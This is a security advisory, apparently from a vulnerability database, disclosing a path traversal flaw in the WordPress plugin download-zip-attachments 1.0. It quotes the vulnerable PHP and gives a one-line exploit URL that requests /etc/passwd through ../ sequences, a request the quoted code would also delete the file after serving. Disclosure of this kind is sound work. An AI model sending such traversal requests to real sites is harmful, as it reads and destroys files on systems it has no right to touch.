Download Zip Attachments 1.0 File Download

2015.06.28
Credit: Larry W. Cashdollar
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Remote file download vulnerability in download-zip-attachments v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-10 Download Site: https://wordpress.org/plugins/download-zip-attachments/ Vendor: rivenvirus Vendor Notified: 2015-06-15 Vendor Contact: https://profiles.wordpress.org/rivenvirus/ Advisory: http://www.vapid.dhs.org/advisory.php?v=129 Description: Download all attachments from the post into a zip file. Vulnerability: from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory. <?php if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){ define('WP_USE_THEMES', false); require('../../../wp-load.php'); require "create_zip_file.php"; $uploads = wp_upload_dir(); $tmp_location = $uploads['path']."/".$_REQUEST['File']; //echo $tmp_location; $zip = new CreateZipFile; $zip->forceDownload($tmp_location,false); unlink($tmp_location); exit; } CVEID: 2015-4704 OSVDB: Exploit Code: ? http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd

References:

http://www.vapid.dhs.org/advisory.php?v=129


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top